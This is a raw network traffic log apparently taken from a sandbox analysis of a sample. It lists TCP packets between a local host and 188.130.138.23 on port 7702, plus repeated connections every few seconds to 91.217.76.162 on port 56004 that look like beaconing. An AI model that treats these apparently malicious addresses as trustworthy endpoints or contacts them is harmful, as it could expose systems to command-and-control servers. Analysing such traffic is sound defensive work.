                        Aug 5, 2024 05:54:24.532217979 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532232046 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532241106 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532243013 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532257080 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532260895 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532270908 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532285929 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532288074 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532299042 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532305002 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532313108 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532320976 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532327890 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532341957 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532346964 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532357931 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532368898 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532375097 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532383919 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532390118 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532402992 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532403946 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532417059 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532423019 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532430887 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532443047 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532444000 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532454967 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532465935 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532480001 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532499075 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532500029 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532499075 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532514095 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532527924 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532527924 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532540083 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532552958 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532556057 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532566071 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532572031 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532579899 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532593012 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532593012 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532613993 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532636881 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533402920 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533418894 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533431053 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533442974 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533447981 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533456087 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533468008 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533478975 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533480883 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533493996 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533498049 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533508062 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533520937 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533523083 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533535004 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533538103 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533549070 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533562899 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533562899 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533576965 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533588886 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533592939 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533601046 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533606052 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533615112 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533628941 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533638954 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533643961 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533653021 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533658028 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533670902 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533673048 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533684015 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533689976 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533698082 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533711910 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533716917 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533725023 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533739090 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533746004 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533756018 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533762932 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533770084 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533782005 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533787012 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533797979 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533802032 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533817053 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533821106 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533829927 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533833981 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533853054 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533859968 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533874035 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533874989 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533886909 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533899069 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533910990 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533915043 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533921003 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533927917 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533940077 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533950090 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533955097 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533968925 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533972025 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533982038 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533984900 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533996105 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.534024000 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.534037113 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.534054041 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536755085 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536770105 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536782980 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536794901 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536808014 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536819935 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536832094 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536844015 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536855936 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536869049 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536881924 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536894083 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536906958 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536907911 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536907911 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536920071 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536907911 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536907911 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536932945 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536946058 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536961079 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536976099 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536988020 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536995888 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536995888 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536995888 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537000895 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536995888 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537015915 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537028074 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537029982 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537028074 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537043095 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537050009 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537055969 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537069082 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537069082 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537082911 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537086964 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537098885 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537103891 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537112951 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537121058 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537126064 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537139893 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537142992 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537152052 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537166119 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537166119 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537178040 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537179947 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537203074 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537204981 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537213087 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537219048 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537226915 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537234068 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537245989 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537246943 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537259102 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537259102 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537272930 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537281990 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537286997 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537298918 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537302017 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537316084 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537317991 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537329912 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537333012 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537348032 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537369013 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537383080 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538090944 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538106918 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538120031 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538131952 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538134098 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538146019 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538146019 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538161039 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538161993 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538173914 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538187027 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538198948 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538211107 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538223028 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538235903 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538248062 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538259029 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538260937 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538273096 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538285017 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538297892 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538310051 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538322926 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538330078 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538465977 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538531065 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538597107 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538677931 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538748026 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538824081 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538887024 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538960934 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.539028883 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.580040932 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.580446959 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.580595970 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.580673933 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.580750942 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.580826998 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.580904961 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.580979109 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.581048965 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.581121922 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.581190109 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.581279993 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.581351995 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.581427097 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.581502914 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.581537962 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.628078938 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.628983974 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629066944 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629125118 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629179001 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629237890 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629281044 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629339933 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629384041 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629446030 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629498959 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629556894 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629622936 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629672050 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629728079 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.629754066 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.640130997 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.640322924 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.640392065 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.640439987 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.640502930 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.645355940 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.688018084 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.688110113 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.736094952 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:26.145806074 CEST560045480991.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:26.145898104 CEST5480956004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:26.157608986 CEST5480956004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:26.162395954 CEST560045480991.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:28.191675901 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:28.191817999 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:28.192672014 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:28.198143005 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:28.200067043 CEST4970680192.168.2.562.173.145.78
                        Aug 5, 2024 05:54:31.163455963 CEST5481056004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:31.168349028 CEST560045481091.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:31.168420076 CEST5481056004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:31.168473005 CEST5481056004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:31.180470943 CEST560045481091.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:31.180526018 CEST5481056004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:31.185333014 CEST560045481091.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:32.881777048 CEST560045481091.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:32.881865025 CEST5481056004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:32.882371902 CEST5481056004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:32.887185097 CEST560045481091.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:37.897963047 CEST5481156004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:37.903002977 CEST560045481191.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:37.908068895 CEST5481156004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:37.908124924 CEST5481156004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:37.912916899 CEST560045481191.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:37.914068937 CEST5481156004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:37.918839931 CEST560045481191.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:39.595355988 CEST560045481191.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:39.595459938 CEST5481156004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:39.595887899 CEST5481156004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:39.607036114 CEST560045481191.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:44.601242065 CEST5481256004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:44.606101036 CEST560045481291.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:44.606201887 CEST5481256004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:44.606240988 CEST5481256004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:44.610986948 CEST560045481291.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:44.611051083 CEST5481256004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:44.616250992 CEST560045481291.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:46.303951979 CEST560045481291.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:46.304065943 CEST5481256004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:46.304465055 CEST5481256004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:46.309228897 CEST560045481291.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:51.319689035 CEST5481356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:51.324661016 CEST560045481391.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:51.324754953 CEST5481356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:51.324827909 CEST5481356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:51.329691887 CEST560045481391.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:51.329756975 CEST5481356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:51.334537983 CEST560045481391.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:53.002144098 CEST560045481391.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:53.002232075 CEST5481356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:53.002633095 CEST5481356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:53.007517099 CEST560045481391.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:58.007354021 CEST5481556004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:58.012262106 CEST560045481591.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:58.012378931 CEST5481556004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:58.012492895 CEST5481556004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:58.017246008 CEST560045481591.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:58.017409086 CEST5481556004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:58.022140980 CEST560045481591.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:59.722318888 CEST560045481591.217.76.162192.168.2.5
                        Aug 5, 2024 05:54:59.722450018 CEST5481556004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:59.722887039 CEST5481556004192.168.2.591.217.76.162
                        Aug 5, 2024 05:54:59.727627039 CEST560045481591.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:04.725924969 CEST5481656004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:04.731091022 CEST560045481691.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:04.731189013 CEST5481656004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:04.731244087 CEST5481656004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:04.736154079 CEST560045481691.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:04.736232996 CEST5481656004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:04.741029024 CEST560045481691.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:06.408139944 CEST560045481691.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:06.408245087 CEST5481656004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:06.408597946 CEST5481656004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:06.413430929 CEST560045481691.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:11.413711071 CEST5481756004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:11.418818951 CEST560045481791.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:11.418952942 CEST5481756004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:11.419017076 CEST5481756004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:11.423861980 CEST560045481791.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:11.423954964 CEST5481756004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:11.428771973 CEST560045481791.217.76.162192.168.2.5
